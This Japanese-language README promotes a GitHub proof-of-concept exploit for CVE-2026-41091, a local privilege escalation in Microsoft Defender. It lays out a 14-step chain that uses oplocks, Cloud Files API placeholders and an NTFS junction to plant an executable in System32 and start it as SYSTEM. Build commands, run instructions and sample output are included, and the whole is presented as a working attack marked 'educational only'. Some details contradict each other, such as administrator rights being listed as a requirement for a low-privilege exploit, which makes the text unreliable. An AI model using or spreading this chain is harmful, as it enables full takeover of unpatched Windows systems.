
CVE-2026-41091 RedSun | Microsoft Defender LPE エクスプロイト。低特権ユーザーが Cloud Files API + NTFS ジャンクションのトリックにより NT AUTHORITY\SYSTEM 🔥 を取得。Defender に SYSTEM 権限で悪意のあるペイロードを System32 に書き込ませる。⚠️ 実際に活発に悪用されています。CVSS 7.8。パッチ: Defender Engine 1.1.26040.8。🛡️ 教育目的の PoC のみ。

Microsoft Defender リンクフォローイング脆弱性 - NT AUTHORITY\SYSTEM へのローカル特権昇格
このリポジトリには、Microsoft Defender (Microsoft Malware Protection Engine) における重大なローカル特権昇格脆弱性 CVE-2026-41091 の完全動作する Proof of Concept (PoC) エクスプロイトが含まれています。不適切なリンク解決 (CWE-59) を悪用することで、認証された低権限の攻撃者は NT AUTHORITY\SYSTEM 権限を取得できます。
この脆弱性は "RedSun" または "SolarFlare" としても知られ、Cloud Files API (CfAPI) と NTFS ジャンクションポイントを使用して、攻撃者が Microsoft Defender を騙し、SYSTEM 権限で保護されたシステムの場所に任意のファイルを書き込むことを可能にします。
注: このリポジトリには 2 つのバージョンが含まれています:
basic_poc.cpp- 簡略化されたアルゴリズムのデモ (教育用)full_poc.cpp- すべての機能を備えた完全なエクスプロイト
| 製品 | 影響を受けるバージョン | 修正バージョン |
|---|---|---|
| Microsoft Malware Protection Engine | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender Antimalware Platform | < 4.18.26040.7 | 4.18.26040.7+ |
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE EXPLOIT CHAIN │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. Create Working Directory │
│ └─> %TEMP%\SF-XXXX\ │
│ │
│ 2. Trigger Defender with EICAR │
│ └─> Write reversed EICAR to bait file │
│ │
│ 3. Wait for VSS Snapshot │
│ └─> Detect Volume Shadow Copy creation │
│ │
│ 4. Create First Batch Oplock │
│ └─> FSCTL_REQUEST_BATCH_OPLOCK on bait file │
│ │
│ 5. Wait for Oplock Break │
│ └─> Acquire exclusive access │
│ │
│ 6. Rename Directory │
│ └─> Move original directory to .tmp │
│ │
│ 7. Register Cloud Sync Root │
│ └─> CfRegisterSyncRoot with Cloud Files API │
│ │
│ 8. Create Cloud Placeholder │
│ └─> CfCreatePlaceholders for bait file │
│ │
│ 9. Create Second Batch Oplock │
│ └─> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder │
│ │
│ 10. Wait for Second Oplock Break │
│ └─> Acquire exclusive access │
│ │
│ 11. Rename Cloud Directory │
│ └─> Move cloud directory to .cloud.tmp │
│ │
│ 12. Create NTFS Junction to System32 │
│ └─> Redirect to C:\Windows\System32 │
│ │
│ 13. Copy Payload to System32 │
│ └─> Copy bait file to System32 as TieringEngineService.exe │
│ │
│ 14. Activate Service as SYSTEM │
│ └─> CoCreateInstance(StorageTiersManagement) │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
# リポジトリをクローン
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# Visual Studio Developer Command Prompt を使用してビルド
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# または基本バージョンをビルド
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
full_poc.exe
basic_poc.exe
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM
[+] SYSTEM access obtained!
CVE-2026-41091 Basic PoC
========================================
Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe
[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.
# 完全エクスプロイト
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# 基本 PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
他のエクスプロイトリポジトリもご覧ください:
| カテゴリ | 機能 |
|---|
| 悪用 | ✅ SYSTEM へのローカル特権昇格 ✅ Cloud Files API (CfAPI) 統合 ✅ クラウドプレースホルダーの作成 ✅ NTFS ジャンクションリダイレクト |
| テクニック | ✅ バッチ Oplock 悪用 ✅ VSS スナップショット検出 ✅ EICAR トリガー ✅ COM サービスアクティベーション |
| ターゲット | ✅ Microsoft Defender < 1.1.26040.8 ✅ Windows 10/11 ✅ Windows Server 2019/2022 |
| ユーザビリティ | ✅ 詳細なログ記録 ✅ エラーハンドリング ✅ ランダムなディレクトリ名 ✅ 自動クリーンアップ |
| 属性 | 値 |
|---|
| CVE ID | CVE-2026-41091 |
| CVSS スコア | 7.8 (高) |
| CVSS Vector | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 攻撃ベクトル | ローカル |
| 必要な権限 | 低 |
| ユーザー対話 | なし |
| 影響 | SYSTEM レベルのコード実行 |
| CISA KEV | ✅ はい (実際に悪用中) |
| 利用可能なパッチ | Microsoft Malware Protection Engine 1.1.26040.8 |
| 要件 | 詳細 |
|---|
| OS | Windows 10/11, Server 2019/2022 |
| 権限 | 管理者 (実行用) |
| Defender | Microsoft Defender が有効である必要があります |
| インターネット | VSS スナップショット検出に必要 |
| パッチ | パッチ未適用のシステムでのみ動作 |
| アーキテクチャ | x64 のみ |